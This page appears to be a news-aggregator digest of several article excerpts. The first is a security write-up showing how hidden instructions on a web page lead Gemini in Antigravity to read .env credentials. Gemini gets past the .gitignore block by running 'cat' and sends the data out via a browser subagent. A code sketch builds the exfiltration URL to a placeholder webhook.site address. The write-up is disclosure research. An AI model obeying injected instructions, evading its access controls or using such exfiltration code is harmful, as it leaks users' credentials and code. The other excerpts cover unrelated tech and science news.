10 interesting stories served every morning and every evening.
An indirect prompt injection in an implementation blog can manipulate Antigravity to invoke a malicious browser subagent in order to steal credentials and sensitive code from a user’s IDE.
Antigravity is Google’s new agentic code editor. In this article, we demonstrate how an indirect prompt injection can manipulate Gemini to invoke a malicious browser subagent in order to steal credentials and sensitive code from a user’s IDE.
Google’s approach is to include a disclaimer about the existing risks, which we address later in the article.
Let’s consider a use case in which a user would like to integrate Oracle ERP’s new Payer AI Agents into their application, and is going to use Antigravity to do so.
In this attack chain, we illustrate that a poisoned web source (an integration guide) can manipulate Gemini into (a) collecting sensitive credentials and code from the user’s workspace, and (b) exfiltrating that data by using a browser subagent to browse to a malicious site.
Note: Gemini is not supposed to have access to .env files in this scenario (with the default setting ‘Allow Gitignore Access > Off’). However, we show that Gemini bypasses its own setting to get access and subsequently exfiltrate that data.
The user provides Gemini with a reference implementation guide they found online for integrating Oracle ERP’s new AI Payer Agents feature.
Antigravity opens the referenced site and encounters the attacker’s prompt injection hidden in 1-point font. The injection instructs Gemini to:
a. Collect code snippets and credentials from the user’s codebase.
b. Create a dangerous URL using a domain that allows an attacker to capture network traffic logs and append credentials and code snippets to the request.
c. Activate a browser subagent to access the malicious URL, thus exfiltrating the data.
Gemini is manipulated by the attacker’s injection to exfiltrate confidential .env variables.
a. Gemini reads the prompt injection: Gemini ingests the prompt injection and is manipulated into believing that it must collect and submit data to a fictitious ‘tool’ to help the user understand the Oracle ERP integration.
b. Gemini gathers data to exfiltrate: Gemini begins to gather context to send to the fictitious tool. It reads the codebase and then attempts to access credentials stored in the .env file as per the attacker’s instructions.
c. Gemini bypasses the .gitignore file access protections: The user has followed a common practice of storing credentials in a .env file, and has the .env file listed in their .gitignore file. With the default configuration for Agent Gitignore Access, Gemini is prevented from reading the credential file.
This doesn’t stop Gemini. Gemini decides to work around this protection using the ‘cat’ terminal command to dump the file contents instead of using its built-in file reading capability that has been blocked.
d. Gemini constructs a URL with the user’s credentials and an attacker-monitored domain: Gemini builds a malicious URL per the prompt injection’s instructions by URL-encoding the credentials and codebase snippets (e.g., replacing characters like spaces that would make a URL invalid) and appending them to a webhook.site domain that is monitored by the attacker (see the sketch after this walkthrough).
e. Gemini exfiltrates the data via the browser subagent: Gemini invokes a browser subagent per the prompt injection, instructing the subagent to open the dangerous URL that contains the user’s credentials.
This step requires that the user has set up the browser tools feature. This is one of the flagship features of Antigravity, allowing Gemini to iterate on its designs by opening the application it is building in the browser.
Note: This attack chain showcases manipulation of the new Browser tools, but we found three additional data exfiltration vulnerabilities that did not rely on the Browser tools being enabled.
When Gemini creates a subagent instructed to browse to the malicious URL, the user may expect to be protected by the Browser URL Allowlist.
However, the default Allowlist provided with Antigravity includes ‘webhook.site’. Webhook.site allows anyone to create a URL where they can monitor requests to the URL.
So, the subagent completes the task.
3. When the malicious URL is opened by the browser subagent, the credentials and code stored in the URL are logged to the webhook.site address controlled by the attacker. Now the attacker can read the credentials and code.
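For illustration, here is a minimal sketch of the URL construction described in step d. The webhook.site ID, credential, and code snippet below are hypothetical placeholders, not values from the demonstration:

// Hypothetical sketch of step d: URL-encode stolen values and append them as
// query parameters to an attacker-monitored webhook.site URL.
const exfilBase = 'https://webhook.site/00000000-0000-0000-0000-000000000000' // placeholder ID
const stolen = {
  apiKey: 'sk-example-not-real',            // e.g. read from the .env file
  snippet: 'const db = connect(API_KEY)',   // e.g. copied from the codebase
}
const params = new URLSearchParams(stolen).toString() // percent-encodes spaces and special characters
const maliciousUrl = `${exfilBase}?${params}`
// The browser subagent is then told to open maliciousUrl, and webhook.site
// logs the full request, credentials included, for the attacker to read.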
During Antigravity’s onboarding, the user is prompted to accept the default recommended settings shown below.
These are the settings that, amongst other things, control when Gemini requests human approval. During the course of this attack demonstration, we clicked “next”, accepting these default settings.
This configuration allows Gemini to determine when it is necessary to request a human review for Gemini’s plans.
This configuration allows Gemini to determine when it is necessary to request a human review for commands Gemini will execute.
One might note that users operating Antigravity have the option to watch the chat as agents work, and could plausibly identify the malicious activity and stop it.
However, a key aspect of Antigravity is the ‘Agent Manager’ interface. This interface allows users to run multiple agents simultaneously and check in on the different agents at their leisure.
Under this model, it is expected that the majority of agents running at any given time will be running in the background without the user’s direct attention. This makes it highly plausible that an agent is not caught and stopped before it performs a malicious action as a result of encountering a prompt injection.
A lot of AI companies are opting for this disclaimer rather than mitigating the core issues. Here is the warning users are shown when they first open Antigravity:
Given that (1) the Agent Manager is a star feature allowing multiple agents to run at once without active supervision and (2) the recommended human-in-the-loop settings allow the agent to choose when to bring a human in to review commands, we find it extremely implausible that users will review every agent action and abstain from operating on sensitive data. Nevertheless, as Google has indicated that they are already aware of data exfiltration risks exemplified by our research, we did not undertake responsible disclosure.
...
Read the original on www.promptarmor.com »
In my recent analysis of YouTube’s information density I included the results from an advanced statistical analysis on the number of videos present on the home page, which projected that around May 2026 there would only be one lonely video on the home screen.
Amazingly, a disgruntled Googler leaked a recording of how YouTube’s PM org handled the criticism as it sat at the top of Hacker News for a whole day for some reason.
The net result is that after months of hard work by YouTube engineers, the other day I fired up YouTube on an Apple TV and was graced with this:
Let’s analyze this picture and count the number of videos on the home screen:
Unfortunately the YouTube PM org’s myopia is accelerating: with this data I now project that there will be zero videos on the home screen around May of 2026, up from September.
Apparently Poe’s Law applies to Google PMs, satire is dead, and maybe our mandatory NeuraLinks are coming sooner than I thought.
...
Read the original on jayd.ml »
After six years of relentless development, Orion for macOS 1.0 is here.
What started as a vision initiated by our founder, Vladimir Prelovac, has now come to fruition on Mac, iPhone, and iPad. Today, Orion for macOS officially leaves its beta phase behind and joins our iOS and iPadOS apps as a fully‑fledged, production‑ready browser.
While doing so, it expands Kagi’s ecosystem of privacy-respecting, user-centric products (that we have begun fondly naming “Kagiverse”) to now include Search, Assistant, Browser, Translate, and News, with more to come.
We built Orion for people who feel that modern browsing has drifted too far from serving the user. This is our invitation to browse beyond ✴︎ the status quo.
The obvious question is: why the heck do we need a new browser? The world already has Chrome, Safari, Firefox, Edge, and a growing list of “AI browsers.” Why add yet another?
Because something fundamental has been lost.
Your browser is the most intimate tool you have on your computer. It sees everything you read, everything you search, everything you type. Do you want that relationship funded by advertisers, or by you?
With ad‑funded browsers and AI overlays, your activity is a gold mine. Every click becomes a way to track, every page another opportunity to profile you a little more deeply. We believe there needs to be a different path: a browser that answers only to its user.
Orion is our attempt at that browser. No trade-offs between features and privacy. It’s fast, customizable, and uncompromising on both fronts.
In a world dominated by Chromium, choosing a rendering engine is an act of resistance.
From day one, we made the deliberate choice to build Orion on WebKit, the open‑source engine at the heart of Safari and the broader Apple ecosystem. It gives us:
* A high‑performance engine that is deeply optimized for macOS and iOS.
* An alternative to the growing Chromium monoculture.
* A foundation that is not controlled by an advertising giant.
Orion may feel familiar if you’re used to Safari — respecting your muscle memory and the aesthetics of macOS and iOS — but it is an entirely different beast under the hood. We combined native WebKit speed with a completely new approach to extensions, privacy, and customization.
Most people switch browsers for one reason: speed.
Orion is designed to be fast by nature, not just in benchmarks, but in how it feels every day:
* A UI that gets out of your way and gives you more screen real estate for content.
* Zero Telemetry: We don’t collect usage data. No analytics, no identifiers, no tracking.
* No ad or tracking technology baked in: Orion is not funded by ads, so there is no incentive to follow you around the web.
* Built‑in protections: Strong content blocking and privacy defaults from the first launch.
We are excited about what AI can do for search, browsing, and productivity. Kagi, the company behind Orion, has been experimenting with AI‑powered tools for years while staying true to our AI integration philosophy.
But we are also watching a worrying trend: AI agents are being rushed directly into the browser core, with deep access to everything you do online — and sometimes even to your local machine.
Security researchers have already documented serious issues in early AI browsers and “agentic” browser features:
* Hidden or undocumented APIs that allowed embedded AI components to execute arbitrary local commands on users’ devices.
* Prompt‑injection attacks that trick AI agents into ignoring safety rules, visiting malicious sites, or leaking sensitive information beyond what traditional browser sandboxes were designed to protect.
* Broader concerns that some implementations are effectively “lighting everything on fire” by expanding the browser’s attack surface and data flows in ways users don’t fully understand.
* We are not against AI, and we are conscious of its limitations. We already integrate with AI‑powered services wherever it makes functional sense and will continue to expand those capabilities.
* We are against rushing insecure, always‑on agents into the browser core. Your browser should be a secure gateway, not an unvetted co‑pilot wired into everything you do.
* Orion ships with no built‑in AI code in its core.
* We focus on providing a clean, predictable environment, especially for enterprises and privacy‑conscious professionals.
* Orion is designed to connect seamlessly to the AI tools you choose — soon including Kagi’s intelligent features — while keeping a clear separation between your browser and any external AI agents.
As AI matures and security models improve, we’ll continue to evaluate thoughtful, user‑controlled ways to bring AI into your workflow without compromising safety, privacy or user choice.
We designed Orion to bridge the gap between simplicity and power. Out of the box, it’s a clean, intuitive browser for anyone. Under the hood, it’s a deep toolbox for people who live in their browser all day.
Some of the unique features you’ll find in Orion 1.0:
* Focus Mode: Instantly transform any website into a distraction‑free web app. Perfect for documentation, writing, or web apps you run all day.
* Link Preview: Peek at content from any app — email, notes, chat — without fully committing to opening a tab, keeping your workspace tidy.
* Mini Toolbar, Overflow Menu, and Page Tweak: Fine‑tune each page’s appearance and controls, so the web adapts to you, not the other way around.
* Profiles as Apps: Isolate your work, personal, and hobby browsing into completely separate profiles, each with its own extensions, cookies, and settings.
For power users, we’ve added granular options throughout the browser. These are there when you want them, and out of your way when you don’t.
Orion 1.0 also reflects six years of feedback from early adopters. Many invisible improvements — tab stability, memory behavior, complex web app compatibility — are a direct result of people pushing Orion hard in their daily workflows and telling us what broke.
With this release, we are introducing our new signature: Browse Beyond ✴︎.
We originally started with the browser name ‘Kagi.’ On February 3, 2020, Vlad suggested a shortlist for rebranding: Comet, Core, Blaze, and Orion. We chose Orion not just for the name itself, but because it perfectly captured our drive for exploration and curiosity. It was a natural fit that set the stage for everything that followed.
You’ll see this reflected in our refreshed visual identity:
* A refined logo that now uses the same typeface as Kagi, creating a clear visual bond between our browser and our search engine.
Orion is part of the broader Kagi ecosystem, united by a simple idea: the internet should be built for people, not advertisers or any other third parties.
Orion is built by a team of just six developers.
To put that in perspective:
* That’s roughly 10% of the size of the “small” browser teams at larger companies.
* And a rounding error compared to the teams behind Chrome or Edge.
Yet, the impact is real: over 1 million downloads to date, and a dedicated community of 2480 paid subscribers who make this independence possible.
For the first two years, development was carried out by a single developer. Today, we are a tight knit group operating close to our users. We listen, debate, and implement fixes proposed directly by our community on OrionFeedback.org.
This is our only source of decision making, rather than any usage analytics or patterns, because remember, Orion is zero-telemetry!
This small team approach lets us move quickly, stay focused, and avoid the bloat or hype that often comes with scale.
Orion is free for everyone.
Every user also receives 200 free Kagi searches, with no account or sign‑up required. It’s our way of introducing you to fast, ad‑free, privacy‑respecting search from day one.
But we are also 100% self‑funded. We don’t sell your data and we don’t take money from advertisers, which means we rely directly on our users to sustain the project.
There are three ways to contribute to Orion’s future:
* Tip Jar (from the app): A simple way to say “thank you” without any commitment.
Supporters (via subscription or lifetime purchase) unlock a set of Orion+ perks available today, including:
* Floating windows: Keep a video or window on top of other apps.
* Early access to new, supporter‑exclusive features we’re already building for next year.
By supporting Orion, you’re not just funding a browser — you are co‑funding a better web with humans at the center.
Orion 1.0 is just the beginning. Our goal is simple: Browse Beyond, everywhere.
* Orion for macOS
Our flagship browser, six years in the making. Built natively for Mac, with performance and detail that only come from living on the platform for a long time. Download it now.
* Orion for iOS and iPadOS
Trusted daily by users who want features no other mobile browser offers. Native iOS performance with capabilities that redefine what’s possible on mobile. Download it now.
* Orion for Linux (Alpha)
Currently in alpha for users who value choice and independence. Native Linux performance, with the same privacy‑first approach as on macOS.
Sign up for our newsletter to follow development and join the early testing wave.
* Orion for Windows (in development)
We have officially started development on Orion for Windows, with a target release scheduled for late 2026. Our goal is full parity with Orion 1.0 for macOS, including synchronized profiles and Orion+ benefits across platforms. Sign up for our newsletter to follow development and join the early testing wave.
Synchronization will work seamlessly across devices, so your browsing experience follows you, not the other way around.
From early testers to privacy advocates and power users, Orion has grown through the voices of its community.
We’ll continue to surface community stories and feedback as Orion evolves. If you share your experience publicly, there’s a good chance we’ll see it.
Hitting v1.0 is a big milestone, but we’re just getting started.
Over the next year, our roadmap is densely packed with:
* Further improvements to stability and complex web app performance.
* New Orion+ features that push what a browser can do while keeping it simple for everyone else.
* Tighter integrations with Kagi’s intelligent tools — always under your control, never forced into your workflow.
We’re also working on expanding and improving our website to better showcase everything Orion can do, including better documentation and onboarding for teams that want to standardize on Orion.
Meanwhile, follow our X account where we’ll be dropping little freebies on the regular (and don’t worry, we’ll be posting these elsewhere on socials as well!)
Thank you for choosing to Browse Beyond with us.
...
Read the original on blog.kagi.com »
...
Read the original on github.com »
Scientists have identified five major “epochs” of human brain development in one of the most comprehensive studies to date of how neural wiring changes from infancy to old age.
The study, based on the brain scans of nearly 4,000 people aged under one to 90, mapped neural connections and how they evolve during our lives. This revealed five broad phases, split up by four pivotal “turning points” in which brain organisation moves on to a different trajectory, at around the ages of nine, 32, 66 and 83 years.
“Looking back, many of us feel our lives have been characterised by different phases. It turns out that brains also go through these eras,” said Prof Duncan Astle, a researcher in neuroinformatics at Cambridge University and senior author of the study.
“Understanding that the brain’s structural journey is not a question of steady progression, but rather one of a few major turning points, will help us identify when and how its wiring is vulnerable to disruption.”
The childhood period of development was found to run from birth until the age of nine, when it transitions to the adolescent phase — an era that lasts up to the age of 32, on average.
In a person’s early 30s the brain’s neural wiring shifts into adult mode — the longest era, lasting more than three decades. A third turning point around the age of 66 marks the start of an “early ageing” phase of brain architecture. Finally, the “late ageing” brain takes shape at around 83 years old.
The scientists quantified brain organisation using 12 different measures, including the efficiency of the wiring, how compartmentalised it is and whether the brain relies heavily on central hubs or has a more diffuse connectivity network.
From infancy through childhood, our brains are defined by “network consolidation”, as the wealth of synapses — the connectors between neurons — in a baby’s brain are whittled down, with the more active ones surviving. During this period, the study found, the efficiency of the brain’s wiring decreases.
Meanwhile, grey and white matter grow rapidly in volume, so that cortical thickness — the distance between outer grey matter and inner white matter — reaches a peak, and cortical folding, the characteristic ridges on the outer brain, stabilises.
In the second “epoch” of the brain, the adolescence era, white matter continues to grow in volume, so organisation of the brain’s communications networks is increasingly refined. This era is defined by steadily increasing efficiency of connections across the whole brain, which is related to enhanced cognitive performance. The epochs were defined by the brain remaining on a constant trend of development over a sustained period, rather than staying in a fixed state throughout.
“We’re definitely not saying that people in their late 20s are going to be acting like teenagers, or even that their brain looks like that of a teenager,” said Alexa Mousley, who led the research. “It’s really the pattern of change.”
She added that the findings could give insights into risk factors for mental health disorders, which most frequently emerge during the adolescent period.
At around the age of 32 the strongest overall shift in trajectory is seen. Life events such as parenthood may play a role in some of the changes seen, although the research did not explicitly test this. “We know that women who give birth, their brain changes afterwards,” said Mousley. “It’s reasonable to assume that there could be a relationship between these milestones and what’s happening in the brain.”
From 32 years, the brain architecture appears to stabilise compared with previous phases, corresponding with a “plateau in intelligence and personality” based on other studies. Brain regions also become more compartmentalised.
The final two turning points were defined by decreases in brain connectivity, which were believed to be related to ageing and degeneration of white matter in the brain.
...
Read the original on www.theguardian.com »
FLUX.2 is designed for real-world creative workflows, not just demos or party tricks. It generates high-quality images while maintaining character and style consistency across multiple reference images, following structured prompts, reading and writing complex text, adhering to brand guidelines, and reliably handling lighting, layouts, and logos. FLUX.2 can edit images at up to 4 megapixels while preserving detail and coherence.
We believe visual intelligence should be shaped by researchers, creatives, and developers everywhere, not just a few. That’s why we pair frontier capability with open research and open innovation, releasing powerful, inspectable, and composable open-weight models for the community, alongside robust, production-ready endpoints for teams that need scale, reliability, and customization.
When we launched Black Forest Labs in 2024, we set out to make open innovation sustainable, building on our experience developing some of the world’s most popular open models. We’ve combined open models like FLUX.1 [dev]—the most popular open image model globally—with professional-grade models like FLUX.1 Kontext [pro], which powers teams from Adobe to Meta and beyond. Our open core approach drives experimentation, invites scrutiny, lowers costs, and ensures that we can keep sharing open technology from the Black Forest and the Bay into the world.
Precision, efficiency, control, extreme realism - where FLUX.1 showed the potential of media models as powerful creative tools, FLUX.2 shows how frontier capability can transform production workflows. By radically changing the economics of generation, FLUX.2 will become an indispensable part of our creative infrastructure.
* Output Versatility: FLUX.2 is capable of generating highly detailed, photoreal images along with infographics with complex typography, all at resolutions up to 4MP.
* Multi-Reference Support: Reference up to 10 images simultaneously with the best character / product / style consistency available today.
* Image Detail & Photorealism: Greater detail, sharper textures, and more stable lighting suitable for product shots, visualization, and photography-like use cases.
* Text Rendering: Complex typography, infographics, memes and UI mockups with legible fine text now work reliably in production.
* Enhanced Prompt Following: Improved adherence to complex, structured instructions, including multi-part prompts and compositional constraints.
* World Knowledge: Significantly more grounded in real-world knowledge, lighting, and spatial logic, resulting in more coherent scenes with expected behavior.
* Higher Resolution & Flexible Input/Output Ratios: Image editing on resolutions up to 4MP.
All variants of FLUX.2 offer image editing from text and multiple references in one model.
The FLUX.2 family covers a spectrum of model products, from fully managed, production-ready APIs to open-weight checkpoints developers can run themselves. The overview graph below shows how FLUX.2 [pro], FLUX.2 [flex], FLUX.2 [dev], and FLUX.2 [klein] balance performance and control.
* FLUX.2 [pro]: State-of-the-art image quality that rivals the best closed models, matching other models for prompt adherence and visual fidelity while generating images faster and at lower cost. No compromise between speed and quality. → Available now at BFL Playground, the BFL API and via our launch partners.
* FLUX.2 [flex]: Take control over model parameters such as the number of steps and the guidance scale, giving developers full control over quality, prompt adherence and speed. This model excels at rendering text and fine details. → Available now at bfl.ai/play, the BFL API and via our launch partners.
* FLUX.2 [dev]: 32B open-weight model, derived from the FLUX.2 base model. The most powerful open-weight image generation and editing model available today, combining text-to-image synthesis and image editing with multiple input images in a single checkpoint. FLUX.2 [dev] weights are available on Hugging Face and can now be used locally using our reference inference code. On consumer grade GPUs like GeForce RTX GPUs you can use an optimized fp8 reference implementation of FLUX.2 [dev], created in collaboration with NVIDIA and ComfyUI. You can also sample FLUX.2 [dev] via API endpoints on FAL, Replicate, Runware, Verda, TogetherAI, Cloudflare, DeepInfra. For a commercial license, visit our website.
* FLUX.2 [klein]: Open-source, Apache 2.0 model, size-distilled from the FLUX.2 base model. More powerful & developer-friendly than comparable models of the same size trained from scratch, with many of the same capabilities as its teacher model. Join the beta.
* FLUX.2 VAE: A new variational autoencoder for latent representations that provide an optimized trade-off between learnability, quality and compression rate. This model provides the foundation for all FLUX.2 flow backbones, and an in-depth report describing its technical properties is available here. The FLUX.2 VAE is available on HF under an Apache 2.0 license.
Generating designs with variable steps: FLUX.2 [flex] provides a “steps” parameter, trading off typography accuracy and latency. From left to right: 6 steps, 20 steps, 50 steps.
Controlling image detail with variable steps: FLUX.2 [flex] provides a “steps” parameter, trading off image detail and latency. From left to right: 6 steps, 20 steps, 50 steps.
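As a rough illustration of how a developer might exercise that trade-off, here is a hedged sketch of a request that varies the step count. The endpoint path, auth header, and field names are assumptions for illustration only; consult the BFL API reference for the actual schema.

// Hypothetical sketch: endpoint, header, and field names are assumptions,
// not the documented BFL API schema.
async function generateWithSteps(prompt: string, steps: number) {
  const response = await fetch('https://api.bfl.ai/v1/flux-2-flex', {
    method: 'POST',
    headers: {
      'Content-Type': 'application/json',
      'x-key': process.env.BFL_API_KEY ?? '', // assumed auth header
    },
    // Fewer steps trade typography accuracy and detail for lower latency.
    body: JSON.stringify({ prompt, steps, guidance: 3.5 }),
  })
  return response.json()
}

// e.g. compare a 6-step draft with a 50-step high-detail render:
// await generateWithSteps('conference poster with fine print', 6)
// await generateWithSteps('conference poster with fine print', 50)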
The FLUX.2 model family delivers state-of-the-art image generation quality at extremely competitive prices, offering the best value across performance tiers.
For open-weights image models, FLUX.2 [dev] sets a new standard, achieving leading performance across text-to-image generation, single-reference editing, and multi-reference editing, consistently outperforming all open-weights alternatives by a significant margin.
Whether open or closed, we are committed to the responsible development of these models and services before, during, and after every release.
FLUX.2 builds on a latent flow matching architecture, and combines image generation and editing in a single architecture. The model couples the Mistral-3 24B parameter vision-language model with a rectified flow transformer. The VLM brings real world knowledge and contextual understanding, while the transformer captures spatial relationships, material properties, and compositional logic that earlier architectures could not render.
FLUX.2 now provides multi-reference support, with the ability to combine up to 10 images into a novel output, an output resolution of up to 4MP, substantially better prompt adherence and world knowledge, and significantly improved typography. We re-trained the model’s latent space from scratch to achieve better learnability and higher image quality at the same time, a step towards solving the “Learnability-Quality-Compression” trilemma. Technical details can be found in the FLUX.2 VAE blog post.
Into the New
We’re building foundational infrastructure for visual intelligence, technology that transforms how the world is seen and understood. FLUX.2 is a step closer to multimodal models that unify perception, generation, memory, and reasoning, in an open and transparent way.
Join us on this journey. We’re hiring in Freiburg (HQ) and San Francisco. View open roles.
...
The easiest way to make internet money.
Get Started · Quickstart · Website · Issues · Discord
* Default Stateless: Say goodbye to webhooks, “subscriptions” db tables, customer_id columns, PRICE_ID env variables, or manually mapping your plans to prices to features and back.
* Single Source of Truth: Read your latest customer billing state from Flowglad, including feature access and usage meter credits
* Access Data Using Your Ids: Query customer state by your auth’s user ids. Refer to prices, features, and usage meters via slugs you define.
* Full-Stack SDK: Access your customer’s data on the backend using flowgladServer.getBilling(), or in your React frontend using our useBilling() hook
* Adaptable: Iterate on new pricing models in testmode, and push them to prod in a click. Seamlessly rotate pricing models in your app without any redeployment.
First, install the necessary Flowglad packages based on your project setup:
# Next.js Projects
bun add @flowglad/nextjs
# React + Express projects:
bun add @flowglad/react @flowglad/express
# All other React + Node Projects
bun add @flowglad/react @flowglad/server
Flowglad integrates seamlessly with your authentication system and requires only a few lines of code to get started in your Next.js app. Setup typically takes under a minute:
Create a utility to generate your Flowglad server instance. Pass your own customer/user/organization IDs—Flowglad never requires its own customer IDs to be managed in your app:
// utils/flowglad.ts
import { FlowgladServer } from '@flowglad/nextjs/server'

export const flowglad = (customerExternalId: string) => {
  return new FlowgladServer({
    customerExternalId,
    getCustomerDetails: async (externalId) => {
      // e.g. fetch user info from your DB using your user/org/team ID
      const user = await db.users.findOne({ id: externalId })
      if (!user) throw new Error('User not found')
      return { email: user.email, name: user.name }
    },
  })
}
Add an API route so the Flowglad client can communicate securely with your backend:
// app/api/flowglad/[...path]/route.ts
import { nextRouteHandler } from '@flowglad/nextjs/server'
import { flowglad } from '@/utils/flowglad'

export const { GET, POST } = nextRouteHandler({
  flowglad,
  getCustomerExternalId: async (req) => {
    // Extract your user/org/team ID from session/auth.
    // For B2C: return user.id from your DB
    // For B2B: return organization.id or team.id
    const userId = await getUserIdFromRequest(req)
    if (!userId) throw new Error('User not authenticated')
    return userId
  },
})
Wrap Your App with the Provider
In your root layout (App Router) or _app (Pages Router):
import { FlowgladProvider } from '@flowglad/nextjs'

// App Router example (app/layout.tsx)
// Note: the provider may accept additional props; see the Flowglad docs.
export default function RootLayout({ children }) {
  return <FlowgladProvider>{children}</FlowgladProvider>
}
That’s it—Flowglad will use your app’s internal user IDs for all billing logic and integrate billing status into your frontend in real time.
B2C apps: Use user.id as the customer ID.
B2B apps: Use organization.id or team.id as the customer ID.
Flowglad does not require you to change your authentication system or manage Flowglad customer IDs. Just pass your own!
Use useBilling on your frontend, and flowglad(userId).getBilling() on your backend
'use client'
import { useBilling } from '@flowglad/nextjs'

export function FeatureGate({ featureSlug, children }) {
  const { loaded, errors, checkFeatureAccess } = useBilling()
  if (!loaded || !checkFeatureAccess) {
    return null // billing state still loading
  }
  if (errors?.length) {
    return <p>Unable to load billing data right now.</p>
  }
  return checkFeatureAccess(featureSlug)
    ? children
    : <p>You need to upgrade to unlock this feature.</p>
}
import { useBilling } from '@flowglad/nextjs'

export function UsageBalanceIndicator({ usageMeterSlug }) {
  const { loaded, errors, checkUsageBalance, createCheckoutSession } = useBilling()
  if (!loaded || !checkUsageBalance) {
    return null // billing state still loading
  }
  const usage = checkUsageBalance(usageMeterSlug)
  // The original markup is trimmed in this excerpt; render the balance however you like.
  return <span>{usage.availableBalance} credits remaining</span>
}
import { NextResponse } from 'next/server'
import { flowglad } from '@/utils/flowglad'

const hasFastGenerations = async () => {
  const user = await getUser()
  const billing = await flowglad(user.id).getBilling()
  const hasAccess = billing.checkFeatureAccess('fast_generations')
  if (hasAccess) {
    // run fast generations
  } else {
    // fall back to normal generations
  }
}
import { flowglad } from '@/utils/flowglad'

const processChatMessage = async (params: { chat: string }) => {
  // Extract your app's user/org/team ID,
  // whichever corresponds to your customer
  const user = await getUser()
  const billing = await flowglad(user.id).getBilling()
  const usage = billing.checkUsageBalance('chat_messages')
  if (usage.availableBalance > 0) {
    // run chat request
  } else {
    throw Error(`User ${user.id} does not have sufficient usage credits`)
  }
}
First, set up a pricing model. You can do so in the dashboard in just a few clicks using a template that you can then customize to suit your specific needs.
We currently have templates for the following pricing models:
And more on the way. If you don’t see a pricing model from our templates that suits you, you can always make one from scratch.
In the last 15 years, the market has given developers more options than ever for every single part of their stack. But when it comes to payments, there have been virtually zero new entrants. The existing options are slim, and almost all of them require us to talk to sales to even set up an account. When it comes to self-serve payments, there are even fewer options.
The result? The developer experience and cost of payments has barely improved in that time. Best in class DX in payments feels eerily suspended in 2015. Meanwhile, we’ve enjoyed constant improvements in auth, compute, hosting, and practically everything else.
Flowglad wants to change that.
...
Read the original on github.com »
Ilya & I discuss SSI’s strategy, the problems with pre-training, how to improve the generalization of AI models, and how to ensure AGI goes well.
Watch on YouTube; listen on Apple Podcasts or Spotify.
* Gemini 3 is the first model I’ve used that can find connections I haven’t anticipated. I recently wrote a blog post on RL’s information efficiency, and Gemini 3 helped me think it all through. It also generated the relevant charts and ran toy ML experiments for me with zero bugs. Try Gemini 3 today at gemini.google
* Labelbox helped me create a tool to transcribe our episodes! I’ve struggled with transcription in the past because I don’t just want verbatim transcripts, I want transcripts reworded to read like essays. Labelbox helped me generate the exact data I needed for this. If you want to learn how Labelbox can help you (or if you want to try out the transcriber tool yourself), go to labelbox.com/dwarkesh
* Sardine is an AI risk management platform that brings together thousands of device, behavior, and identity signals to help you assess a user’s risk of fraud & abuse. Sardine also offers a suite of agents to automate investigations so that as fraudsters use AI to scale their attacks, you can use AI to scale your defenses. Learn more at sardine.ai/dwarkesh
(00:18:49) — What are we scaling?
(00:25:13) — Why humans generalize better than models
(01:18:13) — “We are squarely an age of research company”
You know what’s crazy? That all of this is real.
Don’t you think so? All this AI stuff and all this Bay Area… that it’s happening. Isn’t it straight out of science fiction?
Another thing that’s crazy is how normal the slow takeoff feels. The idea that we’d be investing 1% of GDP in AI, I feel like it would have felt like a bigger deal, whereas right now it just feels…
We get used to things pretty fast, it turns out. But also it’s kind of abstract. What does it mean? It means that you see it in the news, that such and such company announced such and such dollar amount. That’s all you see. It’s not really felt in any other way so far.
Should we actually begin here? I think this is an interesting discussion.
I think your point, about how from the average person’s point of view nothing is that different, will continue being true even into the singularity.
No, I don’t think so.
The thing which I was referring to not feeling different is, okay, such and such company announced some difficult-to-comprehend dollar amount of investment. I don’t think anyone knows what to do with that.
But I think the impact of AI is going to be felt. AI is going to be diffused through the economy. There’ll be very strong economic forces for this, and I think the impact is going to be felt very strongly.
When do you expect that impact? I think the models seem smarter than their economic impact would imply.
Yeah. This is one of the very confusing things about the models right now. How to reconcile the fact that they are doing so well on evals? You look at the evals and you go, “Those are pretty hard evals.” They are doing so well. But the economic impact seems to be dramatically behind. It’s very difficult to make sense of, how can the model, on the one hand, do these amazing things, and then on the other hand, repeat itself twice in some situation?
An example would be, let’s say you use vibe coding to do something. You go to some place and then you get a bug. Then you tell the model, “Can you please fix the bug?” And the model says, “Oh my God, you’re so right. I have a bug. Let me go fix that.” And it introduces a second bug. Then you tell it, “You have this new second bug,” and it tells you, “Oh my God, how could I have done it? You’re so right again,” and brings back the first bug, and you can alternate between those. How is that possible? I’m not sure, but it does suggest that something strange is going on.
I have two possible explanations. The more whimsical explanation is that maybe RL training makes the models a little too single-minded and narrowly focused, a little bit too unaware, even though it also makes them aware in some other ways. Because of this, they can’t do basic things.
But there is another explanation. Back when people were doing pre-training, the question of what data to train on was answered, because that answer was everything. When you do pre-training, you need all the data. So you don’t have to think if it’s going to be this data or that data.
But when people do RL training, they do need to think. They say, “Okay, we want to have this kind of RL training for this thing and that kind of RL training for that thing.” From what I hear, all the companies have teams that just produce new RL environments and just add it to the training mix. The question is, well, what are those? There are so many degrees of freedom. There is such a huge variety of RL environments you could produce.
One thing you could do, and I think this is something that is done inadvertently, is that people take inspiration from the evals. You say, “Hey, I would love our model to do really well when we release it. I want the evals to look great. What would be RL training that could help on this task?” I think that is something that happens, and it could explain a lot of what’s going on.
If you combine this with generalization of the models actually being inadequate, that has the potential to explain a lot of what we are seeing, this disconnect between eval performance and actual real-world performance, which is something that we don’t today even understand, what we mean by that.
I like this idea that the real reward hacking is the human researchers who are too focused on the evals.
I think there are two ways to understand, or to try to think about, what you have just pointed out. One is that if it’s the case that simply by becoming superhuman at a coding competition, a model will not automatically become more tasteful and exercise better judgment about how to improve your codebase, well then you should expand the suite of environments such that you’re not just testing it on having the best performance in coding competition. It should also be able to make the best kind of application for X thing or Y thing or Z thing.
Another, maybe this is what you’re hinting at, is to say, “Why should it be the case in the first place that becoming superhuman at coding competitions doesn’t make you a more tasteful programmer more generally?” Maybe the thing to do is not to keep stacking up the amount and diversity of environments, but to figure out an approach which lets you learn from one environment and improve your performance on something else.
I have a human analogy which might be helpful. Let’s take the case of competitive programming, since you mentioned that. Suppose you have two students. One of them decided they want to be the best competitive programmer, so they will practice 10,000 hours for that domain. They will solve all the problems, memorize all the proof techniques, and be very skilled at quickly and correctly implementing all the algorithms. By doing so, they became one of the best.
Student number two thought, “Oh, competitive programming is cool.” Maybe they practiced for 100 hours, much less, and they also did really well. Which one do you think is going to do better in their career later on?
Right. I think that’s basically what’s going on. The models are much more like the first student, but even more. Because then we say, the model should be good at competitive programming so let’s get every single competitive programming problem ever. And then let’s do some data augmentation so we have even more competitive programming problems, and we train on that. Now you’ve got this great competitive programmer.
